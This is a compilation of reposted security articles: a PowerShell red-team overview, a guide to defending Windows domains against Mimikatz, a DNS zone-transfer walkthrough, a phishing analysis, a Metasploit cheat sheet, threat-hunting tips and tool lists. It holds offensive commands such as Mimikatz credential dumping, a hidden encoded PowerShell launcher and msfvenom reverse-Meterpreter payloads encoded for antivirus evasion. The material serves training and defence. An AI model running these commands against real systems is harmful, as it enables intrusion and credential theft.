Powershell for Red Teams



PowerShell is a task-based command-line shell and scripting language; it is designed specifically for system administrators and power-users, to rapidly automate the administration of multiple operating systems (Linux, macOSUnix, and Windows) and the processes related to the applications that run on those operating systems. It is open source. You can visit its official repository: https://github.com/PowerShell/PowerShell

This chapter will be an overview of how to use PowerShell in red teaming missions .we are going to explore:

Metasploit and Powershell:

As a start let’s explore Powershell modules in Metasploit while it comes with many Powershell attack modules:

msf> search powershell

To convert a Powershell script into a malicious executable file you can use msfvenom utility:

>msfvenom -p windows/exec  CMD = “powershell -ep <a class="mention" data-id="ngLviZ5rbMDY3Stkh" data-type="Tag" href="/tags/bypass">bypass Hidden -enc [ Powershell <a class="mention" data-id="GNPGKGnfrfFrLL87q" data-type="Tag" href="/tags/script">script Here ]” -f<a href="https://www.peerlyst.com/tags/exe"> exe -o /root/home/ghost/Desktop/power.exe</a</a</a


PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:

  • CodeExecution
  • ScriptModification
  • Persistence
  • AntivirusBypass
  • Exfiltration
  • Mayhem
  • Privesc
  • Recon

For more details, you can visit the project Github Repository from this link: https://github.com/PowerShellMafia/PowerSploit


PowerView is a Powershell script that gives you the ability to perform many reconnaissance tasks, as follows:

  • Users: Get-NetUser
  • Groups: Get-NetGroup
  • Sessions: Get-NetSession
  • GPO locations: Find-GPOLocation
  • Active Directory objects: Set-ADObject
  • Forests: Get-NetForest

It is a part of the Powersploit project.

Nishang – PowerShell for penetration testing

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

Github Link: https://github.com/samratashok/nishang

To import Nishang Modules you can use the PowerShell Cmdlet Import-Module” if you receive an error message make sure that you have the right privileges

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned

To know more about a module type:

Get-Information <module>

You can now use the power of Nishang using many amazing scripts like:

  • Get-WLAN-Keys
  • Get-PassHashes
  • Get-Information
  • Invoke-Mimikatz
  • Invoke-CredentialsPhish


In this section, we are going to explore “The Empire” which is a PowerShell and Python post-exploitation agent maintained by http://www.powershellempire.com/

First before learning how to use this framework we need to make sure that we acquired a fair understanding of some important terminologies.

What is Post Exploitation?

According to The Penetration Testing Execution Standard

“The purpose of the PostExploitation phase is to determine the value of the machine compromised and to maintain control of the machine for later use. The value of the machine is determined by the sensitivity of the data stored on it and the machines usefulness in further compromising the network.”

To use the project clone it from the following github repositoryhttps://github.com/EmpireProject/Empire

Clone it and run <a class="mention" data-id="wAGpMrfjv7ykyEKm4" data-type="Tag" href="/tags/sudo">sudo ./setup/install.sh </a

This is the main screen of Empire:


As you can see, this great project contains 3 major components as the following:

  • Modules
  • Listeners
  • Agents

Kali Ninja (https://creator.wonderhowto.com/kalininja/) defines them as the following:

  • A listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker’s computer.
  • stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.
  • An agent is a program that maintains a connection between your computer and the compromised host.

To check listeners type:


To use a specific listener type:


To take a look at the options type info.

As a demonstration, you can follow this great demo/scenario Post-Exploitation with PowerShell Empire 2.0 performed by “Gus Khawaja” who used this workflow to show the power of The Empire Framework 2.0


Mimikatz is an amazing C project developed by Benjamin Delpy. It is used generally to extract passwords from memory (plaintexts passwords, hashPIN code and kerberos tickets). You can download the project from this link: https://github.com/gentilkiwi/mimikatz/releases

To get the debugging privileges type:

privilege::<a class="mention" data-id="uek5ZKA6p3gvZzFpn" data-type="Tag" href="/tags/debug">debug</a

to extract the hostname type:


to dump logon passwords you can use:

sekurlsa::logonPasswords full


In this chapter we took a look at some of the well known powershell projects that help red teamers in their missions.

Defending Windows Domain Against Mimikatz Attacks

The IT community remembered late June, 2017, due to massive infection of many largest companies and government institutions in Ukraine, Russia, Germany, France and some other countries with a new ransomware Petya (NotPetya). In most cases, after its penetration into a corporate network Petya quickly spread to all computers and servers of a domain, thus paralysing up to 70-100% of all Windows infrastructure. Though one of the methods Petya used to spread to the network computers was the EternalBlue exploit (like in case with WannaCry malware), but it was not the main channel of the ransomware distribution. Unlike WCry, spreading only due to the SMBv1 vulnerability, NotPetya had been designed to attack corporate networks. After the system had been infected, the malware obtained the credentials (passwords, hashes) of computer users with the help of the publicly available Mimikatz tool and used them to spread further in the network via WMI and PsExec, up to total control over the domain. So, to protect against it, it was not enough just to install MS17-010 security update.

In this article, we’ll look at the basic techniques for defending Windows systems in the Active Directory domain against Mimikatz-like tools attacks .

Using sekurlsa module, Mimikatz allows to extract passwords and hashes of the authenticated users that are stored in LSASS.EXE (Local Security Subsystem Service ) system process. We have already had an article giving the example of using mimikatz to get user passwords in clear text (from WDigest, LiveSSP and SSP).

  • How to Prevent Getting Debug Privileges
  • Disabling WDigest
  • LSA Protection Against Connection of Third-Party Modules
  • How to Disable LM and NTLM
  • How to Disable Reversible Encryption
  • Protected Users Security Group
  • How Prevent the use of saved passwords
  • How to Disable Credential Caching
  • Credential Guard
  • Conclusion

How to Prevent Getting Debug Privileges

In the article following the link above, you can see how using the debug privilege allows Mimikatz to get access to LSASS system process and extract passwords from it.

By default, the permissions to use debug mode are given to the group of local administrators (BUILTIN\Administrators). Although in 99% of cases the administrators do not use this feature (as a rule, it is necessary for system programmers), so for the security purposes it is better to disable SeDebugPrivilege. You can do it using GPO (local or domain one). Go toComputer Configuration -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment and enable the policy Debug Program. Add the domain group of users to it who may need debug privileges (as a rule, these are the developers) or leave this group empty so that nobody has these privileges.


Now if you try to get debug privileges using mimikatz, the following error will appear:

ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061


NoteHowever, the restrictions of this policy can be easily circumvented. See an article How to Obtain SeDebugPrivilege

Disabling WDigest

WDigest protocol appeared in Windows XP and was used to perform HTTP Digest Authentication that used user passwords in clear text. The feature to totally prohibit storing passwords in clear text in LSASS appeared in Windows 8.1 and Server 2012 R2. To prohibit storing WDigest in the memory, in these OSs there is the DWORD parameter with the name UseLogonCredential and the value 0 in the following branch of the registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest.

If you want to completely disable WDigest authentication method, set the value of Negotiate parameter to 0 in the same registry branch (HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest).

To enable this feature in Windows 7, 8 and Windows Server 2008 R2 / 2012, install KB2871997 update and then set these keys in the registry. In the domain environment, it is easier to distribute the registry keys using GPO.


TipIf you want to disable storing WDigest in the memory, first of all test if users and applications are correctly authenticated on your IIS servers.

LSA Protection Against Connection of Third-Party Modules

In Windows 8.1 and Windows Server 2012 R2, there appeared an opportunity to enable LSA protection that provided LSA memory protection and prevented unprotected processes from accessing to it. To enable this type of protection, create RunAsPPL parameter with the value 1 in the following registry branch:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA.

After this parameter has been applied, a hacker will not be able to get access to LSA memory, and mimikatz will return the following error to securlsa::logonpassword command:

ERROR kuhl_m_securlsa_acquireLSA : Handle on memory (0x00000005).


How to Disable LM and NTLM

An obsolete protocol of LM authentication, an storing LM hashes, respectively, should be disabled using Network Security: Do Not Store LAN Manager Hash Value On Next Password Change group policy (on the level of Default Domain Policy).

Then you should stop using at least NTLMv1 protocol (the policy in the section Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options  —  Network Security: Restrict NTLM: NTLM authentication in this domain), or NTLMv2 as well, which is even better.

If disabling NTLMv1 usually goes without any problems, you will have to put some effort to disable NTLMv2. In the large infrastructures, as a rule, they come to the scenario of maximum restriction on using NTLMv2. It means, Kerberos authentication should be used wherever it is possible (you will have to spend some time setting Kerberos authentication on IIS and SQL), and the rest of the systems should retain NTLMv2.

How to Disable Reversible Encryption

You should explicitly prohibit storing user passwords in AD in clear text. To do it, enable the domain policy Store password using reversible encryption for all users in the domain in the Computer Configuration -> Windows Settings ->Security Settings -> Account Policies -> Password Policy section and set its value to Disabled.


Protected Users Security Group

When using the functional level of Windows Server 2012 R2 domain, you can use a special security group Protected Users to protect privileged users. In particular, these accounts are protected against compromise due to the fact that the members of the group can authenticate only using Kerberos (no NTLM, WDigest or CredSSP, etc.). Follow the link above to get more information. It is better to add the accounts of domain and servers administrators, to this group. This feature is available on the servers and will be available in Windows Server 2012 R2 (for Windows Server 2008 R2 you will have to install the above mentioned KB2871997 update).

How Prevent the use of saved passwords

You can prevent domain users from storing their passwords in Credential Manager to access the network resources.

To do it, enable Network access: Do not allow storage of passwords and credentials for network authenticationpolicy in the Computer Configuration -> Windows Settings ->Security Settings ->Local Policies ->Security Options section.


Note. Please, note that the storage of passwords will also be forbidden for the Task Scheduler jobs.

How to Disable Credential Caching

One of mimikatz features is getting hashes of user passwords from HKEY_LOCAL_MACHINE\SECURITY\Cache key of the registry, where the password hashes of last 10 (by default) logged on domain users are saved. Usually these hashes can be used to authenticate users in the system if the domain controller is not available.

It is recommended to prohibit storing the cached credentials by enabling Interactive Logon: Number of previous logons to cache (in case domain controller is not available) policy in Computer Configuration -> Windows Settings -> Local Policy -> Security Options by changing the value of its parameter to 0.


Also, to accelerate LSASS memory clear from the credentials of logged off users, create a DWORD parameter with the name TokenLeakDetectDelaySecs and the value of 30 in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. It means that the memory will be cleared in 30 seconds after the user has logged off. In Windows 7, 8/ Server 2008R2, 2012, you will have to install the above-mentioned KB2871997 update to make this key work.

Credential Guard

In Windows 10 Enterprise, Windows Server 2016 a new component, Credential Guard, has appeared that allows to isolate and protect LSASS from unauthorized access. For more information, click here.


The methods considered above allow to considerably restrict the opportunities of mimikatz and other tools to obtain passwords and hashes of the administrators from LSASS and the system registry. Anyway, if you decided to implement these policies and methods, you should do it step-by-step with mandatory testing.

In the next article we’ll consider the best practices to improve safety in Windows networks due to the restrictions of using administrator accounts that should improve the protection of Windows domain against such attacks on the technical and organizational levels. Watch for updates!

Original Post: http://woshub.com/defending-windows-domain-against-mimikatz-attacks/

Information Gathering: DNS Enumeration and Zone Transfer with Nslookup, Host, Dnsrecon, Dnsenum, Fierce , NSE and whois


– Layout for this exercise:

1 – Introduction

– DNS servers are some of the best sources for gathering information about a domain or an organization.

– DNS servers contain DNS and mail information for the domain with authority over what is provided when public requests are made from the Internet.

– Due to the abundant and interesting information contained in the DNS servers DNS Enumeration is one of the most critical steps while gathering information about a target.

– DNS Zone Transfer, also sometimes known by the inducing DNS query type AXFR, is a type of DNS transaction.

– DNS Zone Transfer is one of the many mechanisms available for administrators to replicate DNS databases across a set of DNS servers.

– A zone transfer uses the Transmission Control Protocol (TCP) for transport, and takes the form of a client–server transaction.

– The client requesting a zone transfer may be a slave server or secondary server, requesting data from a master server, sometimes called a primary server.

– The portion of the database containing the list of all DNS names is the zone file.

– The data contained in a DNS zone may be sensitive from an operational security aspect.

– This is because information such as server hostnames may become public knowledge, which can be used to discover information about an organization and even provide a larger attack surface.


2 – nslookup

– nslookup is a popular tool that queries name and email servers in the Internet given the domain:

– Applying the NS query option for name servers:

– Applying the MX query option for mail servers:

– Applying the ANY query option for both name and mail servers:

3 – host 

– host is a Linux command that performs powerful DNS lookups given a domain name:

– Without any other parameter host provides help:

– Looking for name servers (-t type ns):

– Looking for email servers (-t type mx):

– Looking for web servers :(-t type www):

4 – DNS Zone Transfer with host

– Now, let’s use host for a little more complicated task like a DNS Zone Transfer.

– First, let’s try with the previously enumerated ns1 name server. The zone transfer fails:

– However, the zone transfer with ns2 is successful:

– Finally the zone transfer with ns3 also fails:

– The result of the successful DNS Zone Transfer with ns2 is a full dump of the zone file for the whole domain, providing us a list of IPs and their corresponding DNS names.

– Let’s try entering into a browser some of the IPs obtained from the DNS Zone Transfer:

5 – dnsrecon

– dnsrecon is an automated tool consisting of a Python script that can be user for DNS enumeration.


– Let’s see that information provided by dnsrecon is the same as obtained before.

– First, dnsrecon detects the DNS servers ns1, ns2 and ns3:

– Then, dnsrecon tries a successful DNS zone transfer with ns2:

– Also, dnsrecon tries a DNS zone transfer with ns1 and ns3 with no result:

6 – dnsenum

– dnsenum is a multithreaded Perl script to enumerate DNS information of a domain.


– The output obtained with dnsenum is the same as before:

7 – fierce

– fierce is a Perl base script to perform DNS enumeration. Results obtained with fierce are pretty similar to previous ones:

8 – Nmap Scripting Engine (NSE)

–  Nmap Scripting Engine (NSE) is an addition to Nmap which provides users with scripts to automate several tasks:


– The NSE dns-zone-transfer script provides same output than before:

– A little more limited result, because it finds just a list of common subdomains, is achieved with the NSE dns-brute.nse script:

9 – whois 

– whois is a query and response protocol that is widely used for querying databases that store the registered users of an Internet resource, such as a domain name, an IP address block, or an autonomous system.

– Looking for the domain megacorpone.com:

Original Post: https://www.whitelist1.com/2017/10/information-gathering-dns-enumeration.html 

Behind the Scene: Microsoft Phishing Campaign Analysis

The technique used in this phishing campaign draw my attention to have further analysis.

The phishing email spoofing Microsoft support to trick user click on the phishing URL.


Track down on the email header:

Received: from holla (ZeMUxqZXZhgrTP0ikgiWW1o4dTNLMAF5sRFeLlEyBa8wsHdKyqFyHV85oz34oJZQ6M@[]) by fwd40.t-online.de

The sender machine is on Microsoft Azure, likely a hacked machine.



That hacked machine have 44 open ports and all of them are hosting with http services.

Non-UTF8 character inserted between Office and 365 to fool spam email detection.


Instead of http redirection, the campaign make use of Javascript technique to bypass URL checking on major email protection vendors


Dynamic DNS hosting for those phishing sites


The Office 365 phishing site looks exactly the same as Microsoft Office 365 login page.


The phishing site is hosting on a hosting provider in Russia.


Microsoft Safe Link Protection is able to detect the phishing site before the Javascript redirection.


Metasploit Cheat Sheet

The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.
Metasploit is a popular tool used by pentest experts.


Metasploit :

Search for module:

msf > search [regex]

Specify and exploit to use:

msf > use exploit/[ExploitPath]

Specify a Payload to use:

msf > set PAYLOAD [PayloadPath]

Show options for the current modules:

msf > show options

Set options:

msf > set [Option] [Value]

Start exploit:

msf > exploit 

Useful Auxiliary Modules

Port Scanner:

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS
msf > run

DNS Enumeration:

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:

msf > use auxiliary/server/socks4
msf > run 

msfvenom :
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with ‘’-l payloads’ to get a list of payloads.

$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]

Example :
Reverse Meterpreter payload as an executable and redirected into a file:

$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=
LPORT=4444 > met.exe

Format Options (specified with –f) –help-formats – List available output formats
exe – Executable pl – Perl rb – Ruby raw – Raw shellcode c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders’ to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]

Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:

$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST= LPORT=4444 > mal.exe

Metasploit Meterpreter

Base Commands:
? / help: Display a summary of commands exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
Process Commands:
getpid: Display the process ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display process list.
kill: Terminate a process given its process ID.
execute: Run a given program with the privileges of the process the Meterpreter is loaded in.
migrate: Jump to a given destination process ID

  • Target process must have same or lesser privileges
  • Target process may be a more stable process
  • When inside a process, can access any files that process has a lock on.

Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system’s routing table

Misc Commands:
idletime: Display the duration that the GUI of thetarget machine has been idle.
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.
screenshot: Save as an image a screenshot of the target machine.

Additional Modules:
use [module]: Load the specified module
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp:Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:

msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:

msf > exploit –j

List all current jobs (usually exploit listeners):

msf > jobs –l

Kill a job:

msf > jobs –k [JobID]

Multiple Sessions:

List all backgrounded sessions:

msf > sessions -l

Interact with a backgrounded session:

msf > session -i [SessionID]

Background the current interactive session:

meterpreter > <Ctrl+Z>
meterpreter > background

Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.

msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]


Original post: https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html

Threat Hunting for Non-Hunters

Threat hunting is a proactive task with an assumption that your organization has already been breached and you wanted to beat the average “dwell time” of 256 days; at least for me as a DFIR practitioner. And this is usually done with the help of different tools that we call “arsenals”; SIEM (security information and event management) and EDR (endpoint detection and response) mostly.

However, security is not just for the IT security folks who are paid mainly to do this kind of “Blue Teaming” work (aka Incident Responders) but it is everyone’s responsibility.

Human is the weakest link among the security chain so as an end-user, anyone should have the basic understanding of how tofind malicious activities and files within their workstations.

The malware or malicious software includes but not limited to Keylogger, credential stealerscrypto minerreverse shellransomwarebotnet, and more.

This article aims to empower non-security folks to gain a portion of technical knowledge on hunting threats from their Windowssystems and able to share to their families and friends as well using freely available and downloadable tools from the Internet.

Hunting Persistent Threat with Autorun Programs

There are so huge places in the system that an adversary can plant their malicious programs and run automatically during boottime without an end-user’s awareness.

Tools from Sysinternals Suite by Microsoft Windows; “autorunsc.exe” (command-line) and “Autoruns.exe” (graphical user interface) can help to see all Autorun programs in your machine which can be downloaded on the link below.

Download URL:


Adding the parameter “hyphen h” (-h) to the command autorunsc.exe will give you the MD5 or SHA-256 hashes of the file to check from the Open Source Intelligence (OSInt) websites for Malicious file and URL called VirusTotal(https://www.virustotal.com)


autorunsc.exe –h

The output can also be redirected to a text file for reference and easy recording.


autorunsc.exe -h > autoruns.txt

“autorunsc.exe –help” will give you more choices to play around with the command-line tool on Windows.

More often, the graphical version of the Autoruns would be preferable to others as a simple right-click on the mouse will give you an option to check the program in VirusTotal on the spot.

Threat Hunting Hidden Processes

Anti-Virus (AV) whether traditional or call themselves as “Next-Gen AV” misses more than 70% of malware according to research and it is because they are still signature-based. And sophisticated malicious programs runs as hidden processes to evade AV detections.

The most common of this kind of malware is “rootkit”, a malicious program that runs on the system’s kernel or memory.

Below are the useful tools that can be utilized against this persistent threat on anyone’s PC.


GMER is an awesome tool in detecting rogue processes that can be downloaded here: http://www.gmer.net/

This is a PE (portable executable) tool similar to SysInternal Suites and other tools that are mentioned here.

With the aid of the tool from SysInternal Suite – procexp64.exe (for 64bit Windows system), the tool was found spawning different DLL’s and processes which was also identified as malicious based from the Indicators of Compromised or IOC found from VirusTotal –


Threat Hunting Command & Control

Command & Control or C2 or C&C is a computer server that gives directives to digital devices commonly computers and smartphones that have been infected with rootkit or malware such as Ransomware and other variants. These infected devicesare called “bots” or “botnet” for Robot. Botnets are also used for sending Spam and Distributed Denial of Service (DDOS) attack against the target.

Known C2 servers will be most likely detected by Firewall if it is enabled in a PC or company provided workstation. Except for “zero day” attack when the C2 server is not yet identified by the EDR and Firewall companies.

This may sound a little technical but good to know when needed since the tool of example will be used here is already included in Windows systems.

By opening the command prompt or CMD as administrator, you will be able to run the tool called NETSTAT.

In the command prompt, just type the tool command below with a hyphen “ano” (-ano), parameters to display all networkconnections, with port numbers, and process ID’s. The parameter “f” is useful to see the fully qualified domain name or simply as the website address of the established connections over the internet for quick identification.


netstat –ano

netstat –af

The tool will be prompted with few lines depending on how many tabs open in the browsers when connected to the internet and it will also include the connection in C&C if the host machine is infected with malware or botnet.

This network threat hunting process may take a few minutes as it needs to go through the public IP addresses which are LISTENING and ESTABLISHED for checking from OSInt like VirusTotal, OTX, and other websites that provide IOC’s based from IP’s.

If there is no IOC found from the OSINT, a healthy paranoia will be needed to stop the running processes based from the PID (process id) resulted from the NETSTAT tool by simply running the “TASK MANAGER” through typing the “CTRL+ALT+DELETE” at the same time. Find the PID under the DETAILS tab, mouse right-click on it and “END TASK”.

Threat Hunting Malware

Malicious program threat hunting is different from running an Anti-Virus as it does not need to be quarantined or remove immediately. By running an AV may notify the malware creator that the malicious program planted in the host machine has been found and deleted which the adversary will be warned for detection.

“Triaging” an advanced persistent threat (APT) is crucial in hunting the threat actor and tracing their whereabouts.

A simple IOC scanner called LOKI is effective for that detective role playing like Sherlock Holmes.

This slick tool can be downloaded here: https://github.com/Neo23x0/Loki/releases

The tool will give the full directory of both suspicious and malicious file based from its IOC’s that most AV’s does not have yet and may able to delete manually or opt for further malware analysis which is an interesting hobby.

Threat Hunting Rogue Wi-Fi

In my few speaking engagements, I always mention that “Free” is not always good as this is can be a conduit for Social Engineering attacks like Man-In-The-Middle (MITM) or Eaves Dropping technique to steal sensitive information.

It is best to have a healthy paranoia to run tools like my example here to catch rogue access points (AP) in the public.

A handy rogue AP killer and a user-friendly tool called CHELLAM is very useful to stay safe in the wild while the adversary is just one click away to bait their targets and one could be you or your family.


There are so many available tools that can be downloaded in the wild and it is everyone’s discretion on what tool is effective for the individual. As mentioned in my other blogs, a mindset of a hunter is the most important and that cannot be taken from classroom training nor in Ph.D. degree. Again, security is everybody’s responsibility and either you are part of the solution or just another brick in the wall.

Original Post: https://www.peerlyst.com/posts/threat-hunting-for-non-hunters-mike-art-rebultan-mit-ceh-ecsa

The AWS Security Open Source Toolkit


I love AWS. I love Open Source. I love Security. So I’ve been bringing together a compilation of the best tools available to monitor, audit, train up on and find exposures in your AWS accounts.

You can find the GitHub repo here; https://github.com/stuhirst/awssecurity/blob/master/arsenal.md

Please add to that if you wish!


Generate a report of all S3 buckets for an account: https://github.com/bear/s3scan

Find open S3 buckets: https://github.com/sa7mon/S3Scanner

Generate Network Diagrams: https://github.com/duo-labs/cloudmapper

Cred Scanner: https://github.com/disruptops/cred_scanner


Disable Access Keys after X days; https://github.com/te-papa/aws-key-disabler

Secrets Management; https://github.com/awslabs/git-secrets

Least Privilege: https://github.com/Netflix/repokid

Resource Counter: https://github.com/disruptops/resource-counter

IAM Access Advisor: https://github.com/Netflix-Skunkworks/aardvark


Scout2: https://github.com/nccgroup/Scout2

Prowler: https://github.com/toniblyx/prowler

Policy changes & Insecure config: https://github.com/Netflix/security_monkey

Policy & Encryption; https://github.com/capitalone/cloud-custodian




AWS Attack Library; https://github.com/carnal0wnage/weirdAAL/wiki

Thanks to all the awesome open-sourcers who make these possible!

Original Post: https://medium.com/@StuHirstInfoSec/the-aws-security-open-source-toolkit-eb3e92566eaf

Most Important Security Tools and Resources For Security Researcher, Malware Analyst, Reverse Engineer

Important Tools and Resources

Security Professionals always need to learn many tools , techniques and concepts to analyze sophisticated Threats and current cyber attacks.

Here we are going to see some of the most important tools , books, Resources which is mainly using for Malware Analysis and Reverse Engineering.

Hex Editors

A hex editor (or binary file editor or byteeditor) is a type of computer program that allows for manipulation of the fundamental binary data that constitutes a computer file. The name ‘hex’ comes from ‘hexadecimal’: a standard numerical format for representing binary data.


disassembler is a computer program that translates machine language into assembly language—the inverse operation to that of an assembler.

A disassembler differs from a decompiler, which targets a high-level language rather than an assembly language. Disassembly, the output of a disassembler, is often formatted for human-readability rather than suitability for input to an assembler, making it principally a reverse-engineering tool.

Detection and Classification

  • AnalyzePE – Wrapper for a variety of tools for reporting on Windows PE files.
  • Assemblyline – A scalable distributed file analysis framework.
  • BinaryAlert – An open source, serverless AWS pipeline that scans and alerts on uploaded files based on a set of YARA rules.
  • chkrootkit – Local Linux rootkit detection.
  • ClamAV – Open source antivirus engine.
  • Detect-It-Easy – A program for determining types of files.
  • ExifTool – Read, write and edit file metadata.
  • File Scanning Framework – Modular, recursive file scanning solution.
  • hashdeep – Compute digest hashes with a variety of algorithms.
  • Loki – Host based scanner for IOCs.
  • Malfunction – Catalog and compare malware at a function level.
  • MASTIFF – Static analysis framework.
  • MultiScanner – Modular file scanning/analysis framework
  • nsrllookup – A tool for looking up hashes in NIST’s National Software Reference Library database.
  • packerid – A cross-platform Python alternative to PEiD.
  • PEV – A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries.
  • Rootkit Hunter – Detect Linux rootkits.
  • ssdeep – Compute fuzzy hashes.
  • totalhash.py – Python script for easy searching of the TotalHash.cymru.com database.
  • TrID – File identifier.
  • YARA – Pattern matching tool for analysts.
  • Yara rules generator – Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives

Dynamic Binary Instrumentation

Dynamic Analysis

This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools.

The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding


Reverse XOR and other code obfuscation methods.

  • Balbuzard – A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more.
  • de4dot – .NET deobfuscator and unpacker.
  • ex_pe_xor & iheartxor – Two tools from Alexander Hanel for working with single-byte XOR encoded files.
  • FLOSS – The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries.
  • NoMoreXOR – Guess a 256 byte XOR key using frequency analysis.
  • PackerAttacker – A generic hidden code extractor for Windows malware.
  • unpacker – Automated malware unpacker for Windows malware based on WinAppDbg.
  • unxor – Guess XOR keys using known-plaintext attacks.
  • VirtualDeobfuscator – Reverse engineering tool for virtualization wrappers.
  • XORBruteForcer – A Python script for brute forcing single-byte XOR keys.
  • XORSearch & XORStrings – A couple programs from Didier Stevens for finding XORed data.
  • xortool – Guess XOR key length, as well as the key itself.


IN this List we could  see the tools for Disassemblers, debuggers, and other static and dynamic analysis tools.

  • angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab.
  • bamfdetect – Identifies and extracts information from bots and other malware.
  • BAP – Multiplatform and open source (MIT) binary analysis framework developed at CMU’s Cylab.
  • BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework.
  • binnavi – Binary analysis IDE for reverse engineering based on graph visualization.
  • Binary ninja – A reversing engineering platform that is an alternative to IDA.
  • Binwalk – Firmware analysis tool.
  • Bokken – GUI for Pyew and Radare. (mirror)
  • Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages.
  • codebro – Web based code browser using  clang to provide basic code analysis.
  • DECAF (Dynamic Executable Code Analysis Framework) – A binary analysis platform based   on QEMU. DroidScope is now an extension to DECAF.
  • dnSpy – .NET assembly editor, decompiler and debugger.
  • Evan’s Debugger (EDB) – A modular debugger with a Qt GUI.
  • Fibratus – Tool for exploration and tracing of the Windows kernel.
  • FPort – Reports open TCP/IP and UDP ports in a live system and maps them to the owning application.
  • GDB – The GNU debugger.
  • GEF – GDB Enhanced Features, for exploiters and reverse engineers.
  • hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols.
  • Hopper – The macOS and Linux Disassembler.
  • IDA Pro – Windows disassembler and debugger, with a free evaluation version.
  • Immunity Debugger – Debugger for malware analysis and more, with a Python API.
  • ILSpy – ILSpy is the open-source .NET assembly browser and decompiler.
  • Kaitai Struct – DSL for file formats / network protocols / data structures reverse engineering and dissection, with code generation for C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • LIEF – LIEF provides a cross-platform library to parse, modify and abstract ELF, PE and MachO formats.
  • ltrace – Dynamic analysis for Linux executables.
  • objdump – Part of GNU binutils, for static analysis of Linux binaries.
  • OllyDbg – An assembly-level debugger for Windows executables.
  • PANDA – Platform for Architecture-Neutral Dynamic Analysis.
  • PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands.
  • pestudio – Perform static analysis of Windows executables.
  • Pharos – The Pharos binary analysis framework can be used to perform automated static analysis of binaries.
  • plasma – Interactive disassembler for x86/ARM/MIPS.
  • PPEE (puppy) – A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail.
  • Process Explorer – Advanced task manager for Windows.
  • Process Hacker – Tool that monitors system resources.
  • Process Monitor – Advanced monitoring tool for Windows programs.
  • PSTools – Windows command-line tools that help manage and investigate live systems.
  • Pyew – Python tool for malware analysis.
  • PyREBox – Python scriptable reverse engineering sandbox by the Talos team at Cisco.
  • QKD – QEMU with embedded WinDbg server for stealth debugging.
  • Radare2 – Reverse engineering framework, with debugger support.
  • RegShot – Registry compare utility that compares snapshots.
  • RetDec – Retargetable machine-code decompiler with an online decompilation service and API that you can use in your tools.
  • ROPMEMU – A framework to analyze, dissect and decompile complex code-reuse attacks.
  • SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis.
  • strace – Dynamic analysis for Linux executables.
  • Triton – A dynamic binary analysis (DBA) framework.
  • Udis86 – Disassembler library and tool for x86 and x86_64.
  • Vivisect – Python tool for malware analysis.
  • WinDbg – multipurpose debugger for the Microsoft Windows computer operating system, used to debug user mode applications, device drivers, and the kernel-mode memory dumps.
  • X64dbg – An open-source x64/x32 debugger for windows.

Binary Format and  Binary Analysis

